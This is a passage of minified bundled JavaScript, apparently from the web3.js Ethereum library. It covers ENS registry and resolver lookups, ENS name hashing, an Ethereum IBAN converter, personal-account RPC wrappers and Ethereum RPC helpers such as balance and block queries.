                                internalType: "string",
                                name: "indexedKey",
                                type: "string"
                            },
                            {
                                indexed: !1,
                                internalType: "string",
                                name: "key",
                                type: "string"
                            }
                        ],
                        name: "TextChanged",
                        type: "event"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint256",
                                name: "contentTypes",
                                type: "uint256"
                            }
                        ],
                        name: "ABI",
                        outputs: [
                            {
                                internalType: "uint256",
                                name: "",
                                type: "uint256"
                            },
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "addr",
                        outputs: [
                            {
                                internalType: "address payable",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint256",
                                name: "coinType",
                                type: "uint256"
                            }
                        ],
                        name: "addr",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "contenthash",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "name",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            }
                        ],
                        name: "dnsRecord",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "name",
                                type: "bytes32"
                            }
                        ],
                        name: "hasDNSRecords",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            }
                        ],
                        name: "interfaceImplementer",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "address",
                                name: "account",
                                type: "address"
                            },
                            {
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            }
                        ],
                        name: "isApprovedForAll",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "name",
                        outputs: [
                            {
                                internalType: "string",
                                name: "",
                                type: "string"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "pubkey",
                        outputs: [
                            {
                                internalType: "bytes32",
                                name: "x",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "y",
                                type: "bytes32"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            }
                        ],
                        name: "supportsInterface",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "string",
                                name: "key",
                                type: "string"
                            }
                        ],
                        name: "text",
                        outputs: [
                            {
                                internalType: "string",
                                name: "",
                                type: "string"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "zonehash",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    }
                ];
            },
            8677: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.networkIds = t.registryAddresses = t.methodsInInterface = t.interfaceIds = void 0, t.interfaceIds = {
                    addr: "0x3b3b57de",
                    name: "0x691f3431",
                    abi: "0x2203ab56",
                    pubkey: "0xc8690233",
                    text: "0x59d1d43c",
                    contenthash: "0xbc1c58d1"
                }, t.methodsInInterface = {
                    setAddr: "addr",
                    addr: "addr",
                    setPubkey: "pubkey",
                    pubkey: "pubkey",
                    setContenthash: "contenthash",
                    contenthash: "contenthash"
                }, t.registryAddresses = {
                    main: "0x00000000000C2E074eC69A0dFb2997BA6C7d2e1e",
                    goerli: "0x00000000000C2E074eC69A0dFb2997BA6C7d2e1e"
                }, t.networkIds = {
                    "0x1": "main",
                    "0x5": "goerli"
                };
            },
            9142: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENS = void 0;
                const i = r(6527), o = r(5071), s = r(6637), a = r(9820), u = r(9970), c = r(8677), l = r(67), d = r(8067);
                class h extends i.Web3Context {
                    constructor(e, t){
                        super(null != t ? t : ""), this.registryAddress = null != e ? e : c.registryAddresses.main, this._registry = new l.Registry(this.getContextObject(), e), this._resolver = new d.Resolver(this._registry);
                    }
                    getResolver(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getResolver(e);
                        });
                    }
                    recordExists(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.recordExists(e);
                        });
                    }
                    getTTL(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getTTL(e);
                        });
                    }
                    getOwner(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getOwner(e);
                        });
                    }
                    getAddress(e, t = 60) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getAddress(e, t);
                        });
                    }
                    getPubkey(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getPubkey(e);
                        });
                    }
                    getContenthash(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getContenthash(e);
                        });
                    }
                    checkNetwork() {
                        return n(this, void 0, void 0, function*() {
                            const e = Date.now() / 1e3;
                            if (!this._lastSyncCheck || e - this._lastSyncCheck > 3600) {
                                const t = yield (0, s.isSyncing)(this);
                                if ("boolean" != typeof t || t) throw new o.ENSNetworkNotSyncedError;
                                this._lastSyncCheck = e;
                            }
                            if (this._detectedAddress) return this._detectedAddress;
                            const t = yield (0, a.getId)(this, Object.assign(Object.assign({}, u.DEFAULT_RETURN_FORMAT), {
                                number: u.FMT_NUMBER.HEX
                            })), r = c.registryAddresses[c.networkIds[t]];
                            if (void 0 === r) throw new o.ENSUnsupportedNetworkError(t);
                            return this._detectedAddress = r, this._detectedAddress;
                        });
                    }
                    supportsInterface(e, t) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.supportsInterface(e, t);
                        });
                    }
                    get events() {
                        return this._registry.events;
                    }
                }
                t.ENS = h;
            },
            1698: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.registryAddresses = void 0;
                const o = r(8677);
                Object.defineProperty(t, "registryAddresses", {
                    enumerable: !0,
                    get: function() {
                        return o.registryAddresses;
                    }
                }), i(r(9142), t);
            },
            67: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Registry = void 0;
                const i = r(3211), o = r(6919), s = r(172), a = r(8677), u = r(8196);
                t.Registry = class {
                    constructor(e, t){
                        this.contract = new i.Contract(o.ENSRegistryAbi, null != t ? t : a.registryAddresses.main, e), this.context = e;
                    }
                    getOwner(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.owner((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    getTTL(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.ttl((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    recordExists(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.recordExists((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    getResolver(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.resolver((0, u.namehash)(e)).call().then((e)=>{
                                    if ("string" == typeof e) return new i.Contract(s.PublicResolverAbi, e, this.context);
                                    throw new Error;
                                });
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    get events() {
                        return this.contract.events;
                    }
                };
            },
            8067: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Resolver = void 0;
                const i = r(5071), o = r(9634), s = r(7345), a = r(8677), u = r(8196);
                t.Resolver = class {
                    constructor(e){
                        this.registry = e;
                    }
                    getResolverContractAdapter(e) {
                        return n(this, void 0, void 0, function*() {
                            return this.registry.getResolver(e);
                        });
                    }
                    checkInterfaceSupport(e, t) {
                        var r, s;
                        return n(this, void 0, void 0, function*() {
                            if ((0, o.isNullish)(a.interfaceIds[t])) throw new i.ResolverMethodMissingError(null !== (r = e.options.address) && void 0 !== r ? r : "", t);
                            if (!(yield e.methods.supportsInterface(a.interfaceIds[t]).call())) throw new i.ResolverMethodMissingError(null !== (s = e.options.address) && void 0 !== s ? s : "", t);
                        });
                    }
                    supportsInterface(e, t) {
                        var r;
                        return n(this, void 0, void 0, function*() {
                            const n = yield this.getResolverContractAdapter(e);
                            let i = t;
                            if (!(0, s.isHexStrict)(i)) {
                                if (i = null !== (r = (0, o.sha3)(t)) && void 0 !== r ? r : "", "" === t) throw new Error("Invalid interface Id");
                                i = i.slice(0, 10);
                            }
                            return n.methods.supportsInterface(i).call();
                        });
                    }
                    getAddress(e, t = 60) {
                        return n(this, void 0, void 0, function*() {
                            const r = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(r, a.methodsInInterface.addr), r.methods.addr((0, u.namehash)(e), t).call();
                        });
                    }
                    getPubkey(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(t, a.methodsInInterface.pubkey), t.methods.pubkey((0, u.namehash)(e)).call();
                        });
                    }
                    getContenthash(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(t, a.methodsInInterface.contenthash), t.methods.contenthash((0, u.namehash)(e)).call();
                        });
                    }
                };
            },
            8196: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.namehash = t.normalize = void 0;
                const n = r(9634), i = r(6608);
                t.normalize = (e)=>(0, i.ens_normalize)(e), t.namehash = (e)=>{
                    let r = "";
                    for(let e = 0; e < 32; e += 1)r += "00";
                    if (e) {
                        const i = (0, t.normalize)(e).split(".");
                        for(let e = i.length - 1; e >= 0; e -= 1){
                            const t = (0, n.sha3Raw)(i[e]).slice(2);
                            r = (0, n.sha3Raw)(`0x${r}${t}`).slice(2);
                        }
                    }
                    return `0x${r}`;
                };
            },
            5609: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Iban = void 0;
                const n = r(9634), i = r(7345), o = r(5071);
                class s {
                    constructor(e){
                        if (this.toAddress = ()=>{
                            if (this.isDirect()) {
                                const e = this._iban.slice(4), t = s._parseInt(e, 36), r = (0, n.leftPad)(t, 40);
                                return (0, n.toChecksumAddress)(r);
                            }
                            throw new Error("Iban is indirect and cannot be converted. Must be length of 34 or 35");
                        }, !s.isIndirect(e) && !s.isDirect(e)) throw new Error("Invalid IBAN was provided");
                        this._iban = e;
                    }
                    static isDirect(e) {
                        return 34 === e.length || 35 === e.length;
                    }
                    isDirect() {
                        return s.isDirect(this._iban);
                    }
                    static isIndirect(e) {
                        return 20 === e.length;
                    }
                    isIndirect() {
                        return s.isIndirect(this._iban);
                    }
                    static isValid(e) {
                        return /^XE[0-9]{2}(ETH[0-9A-Z]{13}|[0-9A-Z]{30,31})$/.test(e) && 1 === s._mod9710(s._iso13616Prepare(e));
                    }
                    isValid() {
                        return s.isValid(this._iban);
                    }
                    static fromBban(e) {
                        const t = `0${(98 - this._mod9710(this._iso13616Prepare(`XE00${e}`))).toString()}`.slice(-2);
                        return new s(`XE${t}${e}`);
                    }
                    static createIndirect(e) {
                        return s.fromBban(`ETH${e.institution}${e.identifier}`);
                    }
                    static fromAddress(e) {
                        if (!(0, i.isAddress)(e)) throw new o.InvalidAddressError(e);
                        const t = BigInt((0, n.hexToNumber)(e)).toString(36), r = (0, n.leftPad)(t, 15);
                        return s.fromBban(r.toUpperCase());
                    }
                    static toIban(e) {
                        return s.fromAddress(e).toString();
                    }
                    client() {
                        return this.isIndirect() ? this._iban.slice(11) : "";
                    }
                    checksum() {
                        return this._iban.slice(2, 4);
                    }
                    institution() {
                        return this.isIndirect() ? this._iban.slice(7, 11) : "";
                    }
                    toString() {
                        return this._iban;
                    }
                }
                t.Iban = s, s._iso13616Prepare = (e)=>{
                    const t = "A".charCodeAt(0), r = "Z".charCodeAt(0), n = e.toUpperCase();
                    return `${n.slice(4)}${n.slice(0, 4)}`.split("").map((e)=>{
                        const n = e.charCodeAt(0);
                        return n >= t && n <= r ? n - t + 10 : e;
                    }).join("");
                }, s._parseInt = (e, t)=>[
                        ...e
                    ].reduce((e, r)=>BigInt(parseInt(r, t)) + BigInt(t) * e, BigInt(0)), s._mod9710 = (e)=>{
                    let t, r = e;
                    for(; r.length > 2;)t = r.slice(0, 9), r = `${(parseInt(t, 10) % 97).toString()}${r.slice(t.length)}`;
                    return parseInt(r, 10) % 97;
                }, s.toAddress = (e)=>new s(e).toAddress();
            },
            9910: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(5609);
                i(r(5609), t), i(r(1965), t), t.default = o.Iban;
            },
            1965: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            9757: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(9638);
                i(r(9638), t), t.default = o.Personal;
            },
            9638: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Personal = void 0;
                const a = r(6527), u = o(r(706));
                class c extends a.Web3Context {
                    getAccounts() {
                        return s(this, void 0, void 0, function*() {
                            return u.getAccounts(this.requestManager);
                        });
                    }
                    newAccount(e) {
                        return s(this, void 0, void 0, function*() {
                            return u.newAccount(this.requestManager, e);
                        });
                    }
                    unlockAccount(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return u.unlockAccount(this.requestManager, e, t, r);
                        });
                    }
                    lockAccount(e) {
                        return s(this, void 0, void 0, function*() {
                            return u.lockAccount(this.requestManager, e);
                        });
                    }
                    importRawKey(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.importRawKey(this.requestManager, e, t);
                        });
                    }
                    sendTransaction(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.sendTransaction(this.requestManager, e, t);
                        });
                    }
                    signTransaction(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.signTransaction(this.requestManager, e, t);
                        });
                    }
                    sign(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return u.sign(this.requestManager, e, t, r);
                        });
                    }
                    ecRecover(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.ecRecover(this.requestManager, e, t);
                        });
                    }
                }
                t.Personal = c;
            },
            706: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ecRecover = t.sign = t.signTransaction = t.sendTransaction = t.importRawKey = t.lockAccount = t.unlockAccount = t.newAccount = t.getAccounts = void 0;
                const i = r(9634), o = r(6637), s = r(9970), a = r(7345), u = r(1181);
                t.getAccounts = (e)=>n(void 0, void 0, void 0, function*() {
                        return (yield u.personalRpcMethods.getAccounts(e)).map(i.toChecksumAddress);
                    }), t.newAccount = (e, t)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string"
                        ], [
                            t
                        ]);
                        const r = yield u.personalRpcMethods.newAccount(e, t);
                        return (0, i.toChecksumAddress)(r);
                    }), t.unlockAccount = (e, t, r, i)=>n(void 0, void 0, void 0, function*() {
                        return a.validator.validate([
                            "address",
                            "string",
                            "uint"
                        ], [
                            t,
                            r,
                            i
                        ]), u.personalRpcMethods.unlockAccount(e, t, r, i);
                    }), t.lockAccount = (e, t)=>n(void 0, void 0, void 0, function*() {
                        return a.validator.validate([
                            "address"
                        ], [
                            t
                        ]), u.personalRpcMethods.lockAccount(e, t);
                    }), t.importRawKey = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        return a.validator.validate([
                            "string",
                            "string"
                        ], [
                            t,
                            r
                        ]), u.personalRpcMethods.importRawKey(e, t, r);
                    }), t.sendTransaction = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        const n = (0, o.formatTransaction)(t, s.ETH_DATA_FORMAT);
                        return u.personalRpcMethods.sendTransaction(e, n, r);
                    }), t.signTransaction = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        const n = (0, o.formatTransaction)(t, s.ETH_DATA_FORMAT);
                        return u.personalRpcMethods.signTransaction(e, n, r);
                    }), t.sign = (e, t, r, o)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string",
                            "address",
                            "string"
                        ], [
                            t,
                            r,
                            o
                        ]);
                        const n = (0, a.isHexStrict)(t) ? t : (0, i.utf8ToHex)(t);
                        return u.personalRpcMethods.sign(e, n, r, o);
                    }), t.ecRecover = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string",
                            "string"
                        ], [
                            t,
                            r
                        ]);
                        const n = (0, a.isHexStrict)(t) ? t : (0, i.utf8ToHex)(t);
                        return u.personalRpcMethods.ecRecover(e, n, r);
                    });
            },
            9326: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.NUMBER_DATA_FORMAT = void 0;
                const n = r(9970);
                t.NUMBER_DATA_FORMAT = {
                    bytes: n.FMT_BYTES.HEX,
                    number: n.FMT_NUMBER.NUMBER
                };
            },
            6637: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.transactionBuilder = t.detectTransactionType = void 0, r(6985);
                const o = r(1435);
                i(r(1435), t), i(r(1922), t), i(r(4832), t), i(r(8650), t), i(r(3222), t), i(r(5140), t), i(r(1258), t), i(r(7460), t);
                var s = r(7350);
                Object.defineProperty(t, "detectTransactionType", {
                    enumerable: !0,
                    get: function() {
                        return s.detectTransactionType;
                    }
                });
                var a = r(223);
                Object.defineProperty(t, "transactionBuilder", {
                    enumerable: !0,
                    get: function() {
                        return a.transactionBuilder;
                    }
                }), t.default = o.Web3Eth;
            },
            3222: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createAccessList = t.getFeeHistory = t.getProof = t.getChainId = t.getLogs = t.estimateGas = t.call = t.signTransaction = t.sign = t.sendSignedTransaction = t.sendTransaction = t.getTransactionCount = t.getTransactionReceipt = t.getTransactionFromBlock = t.getPendingTransactions = t.getTransaction = t.getUncle = t.getBlockUncleCount = t.getBlockTransactionCount = t.getBlock = t.getCode = t.getStorageAt = t.getBalance = t.getBlockNumber = t.getGasPrice = t.getHashRate = t.isMining = t.getCoinbase = t.isSyncing = t.getProtocolVersion = void 0;
                const i = r(9970), o = r(6527), s = r(9634), a = r(9247), u = r(7345), c = r(5071), l = r(1181), d = r(5900), h = r(1922), f = r(223), p = r(5140), m = r(8736), g = r(8425), y = r(4745), v = r(2117), b = r(9326), E = r(1882), A = r(4429);
                t.getProtocolVersion = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getProtocolVersion(e.requestManager);
                    }), t.isSyncing = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getSyncing(e.requestManager);
                    }), t.getCoinbase = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getCoinbase(e.requestManager);
                    }), t.isMining = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getMining(e.requestManager);
                    }), t.getHashRate = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getHashRate(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getGasPrice = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getGasPrice(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getBlockNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getBlockNumber(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getBalance = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getBalance(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "uint"
                        }, a, o);
                    });
                }, t.getStorageAt = function(e, t, r, o = e.defaultBlock, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), c = (0, u.isBlockTag)(o) ? o : (0, s.format)({
                            format: "uint"
                        }, o, i.ETH_DATA_FORMAT), d = yield l.ethRpcMethods.getStorageAt(e.requestManager, t, n, c);
                        return (0, s.format)({
                            format: "bytes"
                        }, d, a);
                    });
                }, t.getCode = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getCode(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "bytes"
                        }, a, o);
                    });
                }, t.getBlock = function(e, t = e.defaultBlock, r = !1, o) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const o = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockByHash(e.requestManager, o, r);
                        } else {
                            const o = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockByNumber(e.requestManager, o, r);
                        }
                        return (0, s.format)(h.blockSchema, n, o);
                    });
                }, t.getBlockTransactionCount = function(e, t = e.defaultBlock, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
